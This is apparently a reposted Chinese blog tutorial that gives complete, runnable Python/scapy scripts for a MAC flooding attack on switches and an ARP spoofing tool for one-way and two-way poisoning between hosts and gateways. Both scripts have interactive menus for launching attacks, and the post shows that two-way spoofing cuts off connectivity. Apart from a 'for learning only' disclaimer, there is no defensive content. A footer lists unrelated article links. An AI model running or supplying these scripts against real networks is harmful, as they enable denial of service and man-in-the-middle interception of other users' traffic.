python 实现MAC泛洪与ARP欺骗

news2025/8/6 23:27:44

声明:本文章的一切内容仅用于交流与学习

目录

一、Python scapy

二、MAC泛洪

三、ARP欺骗


一、Python scapy

scapy提供了构造、发送、接收、分析数据包的功能

scapy的内容很多这里只说明要用到的内容

RandMAC:自动生成一个随机的MAC地址

packet = Ether(src=MAC1, dst=MAC2) / IP(src=IP1, dst=IP2)

Ether是指定MAC地址用的,IP是第三层指定IP

sendp 发送二层报文

send 发送三层报文

基本上这些就够用了

二、MAC泛洪

很早很早之前写过用macof工具来实现MAC泛洪,现在要自己写一个!

MAC泛洪原理前面也写过,如果不清楚可以去看——》传送门

MAC泛洪的实质其实就是发送一堆随机的MAC地址,从而占满交换机的MAC地址表,但是发IPV4的报文还是需要指定IP的

所以第一步就是构造一组假的源目IP 源目MAC地址

构造MAC地址非常容易只需要使用RandMAC就可以生成

构造IP,需要写一个小函数

def randIP():
    ip=""
    for i in range(3):
        ip=ip+str(random.randint(0,255))+"."
    ip=ip+str(random.randint(0,255))
    return ip

分析一下,其实就是先循环三遍每一遍向字符串中添加一个0-255的数和一个点,如192. 

最后再加一个数,构成一个完整的ip格式

有了这两个函数以后,就可以构造数据包了

MAC1=RandMAC("*:*:*:*:*:*")
MAC2 = RandMAC("*:*:*:*:*:*")
IP1=randIP()
IP2=randIP()
packet = Ether(src=MAC1, dst=MAC2) / IP(src=IP1, dst=IP2)

源目MAC地址 源目IP 默认为IPV4报文

接下来就是发送,因为scapy发送有一个小瑕疵,就是每次都输出一个发送成功,影响美观,于是做点小改动

 oldPrint = sys.stdout
    sys.stdout = open('trash.txt', 'w')
    sendp(packet, iface=iface, loop=0)
    sys.stdout = oldPrint
    print(f"{MAC1}---------->{MAC2}   /IP  {IP1}---------->{IP2}")

这样就可以自定义输出格式了

到这里MAC泛洪的一个数据包就构造发送好啦,剩下的就是循环了

这里说一下sendp 有一个参数iface是用来指定网卡的,可以加进去,动态选择网卡

把上面的内容封装了一下,输入处理了一下

完整代码

from scapy.all import *
from scapy.layers.inet import *
import random
def randIP():
    ip=""
    for i in range(3):
        ip=ip+str(random.randint(0,255))+"."
    ip=ip+str(random.randint(0,255))
    return ip
iface='eth0'
def gj():
    MAC1=RandMAC("*:*:*:*:*:*")
    MAC2 = RandMAC("*:*:*:*:*:*")
    IP1=randIP()
    IP2=randIP()
    packet = Ether(src=MAC1, dst=MAC2) / IP(src=IP1, dst=IP2)
    oldPrint = sys.stdout
    sys.stdout = open('trash.txt', 'w')
    sendp(packet, iface=iface, loop=0)
    sys.stdout = oldPrint
    print(f"{MAC1}---------->{MAC2}   /IP  {IP1}---------->{IP2}")
def ts():
    global iface
    a=int(input(f"当前网卡为{iface},【1】更改网卡,【2】发起攻击,【3】指定攻击次数,【0】退出\n"))
    if a==1:
        iface=input("请输入网卡名\n")
        ts()
        return
    elif a==2:
        while True:
          gj()
    elif a==3:
        b=int(input("输入攻击次数\n"))
        print("攻击开始....")
        for i in range(b):
            gj()
    elif a==0:
       return
print("*" * 25 + "MAC泛洪攻击" + "*" * 25)
ts()

运行效果

 

三、ARP欺骗

arp欺骗原理——》传送门 

arp欺骗其实更简单,明白原理代码反而好写

完整代码,相信各位大佬都能看懂,看不懂直接留言或私信都可

from scapy.all import *
from scapy.layers.inet import *
from scapy.layers.l2 import ARP
import time

def get_mac_address():
    import uuid
    node = uuid.getnode()
    mac = uuid.UUID(int = node).hex[-12:]
    MAC = ":".join([mac[e:e + 2] for e in range(0, 11, 2)])
    return MAC
print(get_mac_address())
def dx(IP1,IP2):
    a=get_mac_address()
    pkt=ARP(psrc=IP1,hwsrc=a,pdst=IP2,op=2)
    oldPrint = sys.stdout
    sys.stdout = open('trash.txt', 'w')
    send(pkt)
    sys.stdout = oldPrint
    print(f"{a} : 告诉{IP2},{IP1} 的MAC地址是{a}")
def fx(IP1,IP2):
    a = get_mac_address()
    pkt = ARP(psrc=IP2, hwsrc=a, pdst=IP1, op=2)
    oldPrint = sys.stdout
    sys.stdout = open('trash.txt', 'w')
    send(pkt,iface="eth0")
    sys.stdout = oldPrint
    print(f"{a} : 告诉{IP1},{IP2} 的MAC地址是{a}")

print("*"*25+"ARP欺骗"+"*"*25)
a=int(input("【1】单向欺骗【2】双向欺骗【0】退出\n"))
if a==1:
    IP1=input("请输入要攻击的主机IP\n")
    IP2 = input("请输被欺骗的主机IP/网关\n")
    while True:
        dx(IP1,IP2)
        time.sleep(1)
elif a==2:
    IP1 = input("请输入IP1\n")
    IP2 = input("请输入IP2\n")
    while True:
        dx(IP1,IP2)
        fx(IP1,IP2)
        time.sleep(1)
else:
    exit(0)

运行效果

 

 

因为是单向欺骗,所以PC1 ping PC2 可以通, PC2 ping PC1 通不了

接下来就是双向欺骗

 

 

 都不通啦

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/15722.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【SpringBoot】idea创建SpringBoot项目及注解配置相关应用

文章目录SpringBoot:一、简言二、SpringBoot作用三、核心功能四、创建springBoot项目1、新建SpringBoot(maven基础下)2、next---选版本导jar包3、创建后的pom.xml4、SpringBoot启动类六、测试项目1.项目构建:2.数据源注入dao层---…

【爬虫系列】Python爬虫实战--招聘网站的职位信息爬取

一、分析 1. 需求分析 从网上找工作,大家一般都会通过各种招聘网站去检索相关信息,今天利用爬虫采集招聘网站的职位信息,比如岗位名称,岗位要求,薪资,公司名称,公司规模,公司位置&…

状态机总结(简洁)

一、概念 状态机简写为 FSM(Finite State Machine),也称为同步有限状态机,我们一般简称为状态机,之所以说“同步”是因为状态机中所有的状态跳转都是在时钟的作用下进行的,而“有限”则是说状态的个数是有…

【面试题】绝对定位和相对定位

absolute和relative分别依据什么定位&#xff1f; relative依据自身定位absolute依据最近一层的定位元素定位&#xff0c;如果上层没有定位元素&#xff0c;则依据body定位 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8&…

学C/C++想提升功底 可以花点时间看看这篇博客---C语言程序环境和预处理

本篇博客介绍了C语言程序环境和预处理.主要包含程序的翻译和运行环境和 各种预处理操作:预定义符号.各种#define 用法 undef的使用条件编译的使用 头文件包含指令 C语言程序环境和预处理一.程序的翻译环境和执行环境1.翻译环境2.运行环境二.预处理详解1.预定义符号2.#define的用…

Winform 自动升级程序

抽时间整理下升级这块的功能&#xff0c;并封装一个升级工具包。 作为winform 程序员都有一个C/S端程序绕不过的问题。那就是如何升级程序&#xff1f; 程序升级两种1.启动时强制更新 2.自动、手动获取更新&#xff0c;并确认是否升级。 今天咱们介绍&#xff0c;自动或者手…

路由进阶:route-policy实验配置

实验拓扑 网络拓扑及IP编址如上图所示&#xff1b;R1、R2运行RIPv2&#xff0c;R2、R3运行OSPF。R1上开设三个Loopback接口&#xff0c;地址分别是192.168.1.1/24、192.168.2.1/24及192.168.3.1/24&#xff0c;R1并没有在这三个接口上激活RIPv2&#xff1b; 实验需求 R1在RIP…

[附源码]计算机毕业设计JAVA航空售票管理系统

[附源码]计算机毕业设计JAVA航空售票管理系统 项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybati…

智慧安防解决方案-最新全套文件

智慧安防解决方案-最新全套文件一、建设背景二、思路架构三、建设方案二、获取 - 智慧安防全套最新解决方案合集一、建设背景 随着经济的发展和城市建设速度的加快&#xff0c;全球各地区的安全问题接踵而至&#xff0c;我国正进入“突发公共事件的高发期”和“社会高风险期”…

LabVIEW性能和内存管理 6

LabVIEW性能和内存管理 6 本文介绍LabVIEW性能和内存管理的几个建议6。 数据空间Dataspaces VI的数据存储在它的数据空间中 每个VI都有自己的数据空间 可重入VIs有多个数据空间 可重入性和数据空间 不可重入的 每个调用共享一个数据空间 一次只能执行一个调用 …

如何把PDF转换成Word文档?给大家分享三种转换方法

如何将PDF文件的格式转换成Word文档来使用呢&#xff1f;对文件的格式转换&#xff0c;相信大家最常转换格式的文件就是这两种了&#xff0c;因为它们存在我们日常的各个角落。我们在工作中需要使用Word来编辑文字&#xff0c;发送或者是下载文件&#xff0c;基本都是PDF格式。…

EN 16034门窗及配件—CE认证

门窗及配件CE认证&#xff08;欧盟强制认证&#xff09;&#xff0d;简介 在欧盟市场“CE”标志属强制性认证标志&#xff0c;以表明产品符合欧盟《技术协调与标准化新方法》指令的基本要求。这是欧盟法律对产品提出的一种强制性要求。 在门窗及配件上加贴CE标志不但可以证明其…

从零开始学习Linux(1)

Linux基本操作 文章目录Linux基本操作前言一、操作系统相关知识1.什么是操作系统&#xff1f;2.操作系统有什么作用二、Linux基本操作1.ls指令2.pwd命令3.cd命令3.热键4.touch指令5.nano指令6.start指令7.mkdir指令&#xff08;重要&#xff09;8.rmdir指令&&rm指令&am…

蓝牙学习二(连接和通讯简述)

1.简介 蓝牙的通信是双向的&#xff0c;为了创建和维护一个BLE通信连接&#xff0c;在蓝牙中引入了“角色”这一概念&#xff0c;一个BLE设备不是主机&#xff08;集中器&#xff09;就是从机&#xff08;外围设备&#xff09;角色&#xff0c;这是根据是谁发起这个连接来确定的…

JVM - G1收集器、Region、停顿时间模型、垃圾回收(建议收藏)

​ 编辑切换为居中 添加图片注释&#xff0c;不超过 140 字&#xff08;可选&#xff09; Region 使用G1收集器时&#xff0c;java堆的内存会划分为多个大小相等的独立区域&#xff08;Region&#xff09;&#xff0c;Region中也有新生代和老年代的概念&#xff0c;但是新生…

Source Insight是一个面向项目开发的程序编辑器和代码浏览器丨产品简介

Source Insight是为大型、高要求的现实世界编程项目而设计的。事实上&#xff0c;今天&#xff0c;重要的技术公司正在使用Source Insight来开发一些最大、最成功的商业硬件和软件产品。 代码分析 Source Insight会在您工作时动态解析您的源代码并维护自己的符号信息数据库&a…

Redis实战篇(六)用户签到、UV统计

一、用户签到 1、BitMap用法 我们按月来统计用户签到信息&#xff0c;签到记录为1&#xff0c;未签订则记录为0。 把每一个bit位对应每月的一天&#xff0c;形成映射关系。用0和1标识业务状态&#xff0c;这种思路称为位图&#xff08;BitMap&#xff09;。 Redis中利用strin…

qt qml

QT Quick是QT提供的一种高级用户界面工具包&#xff0c;包含对QML完美支持. Qt Quick 就是使用 QML 构建的一套类库。 Qml模块本身并没有涉及图形显示&#xff0c;所有的图形处理都由Qt Quick模块完成。 QMl是一种高效的开发UI 的语言。QML&#xff08;Qt Meta-Object Languag…

对接建行支付

前两篇文章介绍了对接微信支付和农行支付的方法&#xff0c;这篇文章介绍一下建行支付。 使用场景&#xff1a; 在微信公众号中调用微信付款&#xff0c;或者公众号内页面调用龙支付或者H5页面支付。 一、微信支付 参考建行给的接口文档 交易流程如下&#xff1a; 按照接口要求…

sync_binlog和innodb_flush_log_at_trx_commit的区别

innodb_flush_log_at_trx_commi 这个指的是写redo及后续操作&#xff0c;ib_logfile这个文件的刷新方式。 sync_binlog纯粹指的是binlog &#xff0c;如 mysql-bin0003等。 基于innodb_flush_log_at_trx_commit 的三个参数的解释。 Innodb_flush_log_at_trx_commit 0 redolo…